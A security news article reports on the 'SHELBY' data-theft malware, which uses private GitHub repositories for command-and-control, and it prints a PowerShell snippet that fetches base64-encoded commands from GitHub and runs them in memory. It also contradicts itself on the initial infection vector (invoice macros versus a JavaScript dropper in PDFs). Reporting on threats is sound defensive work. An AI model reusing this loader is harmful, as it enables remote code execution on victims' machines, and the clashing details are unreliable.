A sophisticated new data theft malware strain dubbed “SHELBY” has emerged in the cybersecurity landscape, targeting primarily financial institutions and healthcare organizations across North America and Europe.
The malware employs a multi-stage infection process that begins with phishing emails containing seemingly legitimate invoice attachments that, when opened, trigger a malicious macro that initiates the infection chain.
Once installed, SHELBY operates stealthily in the background, collecting sensitive information including login credentials, financial data, and patient records before exfiltrating them to its operators.
What makes SHELBY particularly notable is its abuse of GitHub’s infrastructure for command-and-control (C2) operations.
The malware creates and accesses private repositories on GitHub where its operators store commands in encoded base64 strings within seemingly innocuous text files.
This approach allows the malware to blend its communication within legitimate HTTPS traffic to GitHub’s domains, making detection significantly more challenging for traditional security tools that typically do not block access to widely-used development platforms.
Elastic analysts identified SHELBY in early March 2025 while investigating a series of data breaches across multiple healthcare providers.
Their analysis revealed that the malware had remained undetected for approximately three months before discovery, highlighting its sophisticated evasion capabilities.
The researchers noted that this represents a growing trend of threat actors leveraging trusted platforms and services to host malicious infrastructure.
The impact of SHELBY has been substantial, with at least 17 organizations confirming data breaches linked to this malware.
Compromised data includes personally identifiable information, healthcare records, and financial account details.
Several affected organizations have already begun notifying customers of potential data exposure in compliance with regulatory requirements.
Infection Mechanism
SHELBY’s infection process begins with a JavaScript dropper embedded in PDF attachments that, when executed, downloads a PowerShell script from a compromised website.
.webp)
The script contains the following code snippet that establishes communication with its GitHub-based C2:-
$repo = "https://api.github.com/repos/legitimate-looking-name/resources/contents"
$token = "ghp_1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0"
$encodedAuth = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("$token"))
$headers = @{"Authorization" = "Basic $encodedAuth"}
$response = Invoke-WebRequest -Uri $repo -Headers $headers | ConvertFrom-Json
$commands = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($response. Content))
Invoke-Expression $commandsThis code retrieves base64-encoded instructions from the GitHub repository, decodes them, and executes them directly in memory, leaving minimal traces on disk.
The malware maintains persistence through a scheduled task that appears as a legitimate system maintenance process, helping it evade detection by security solutions.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
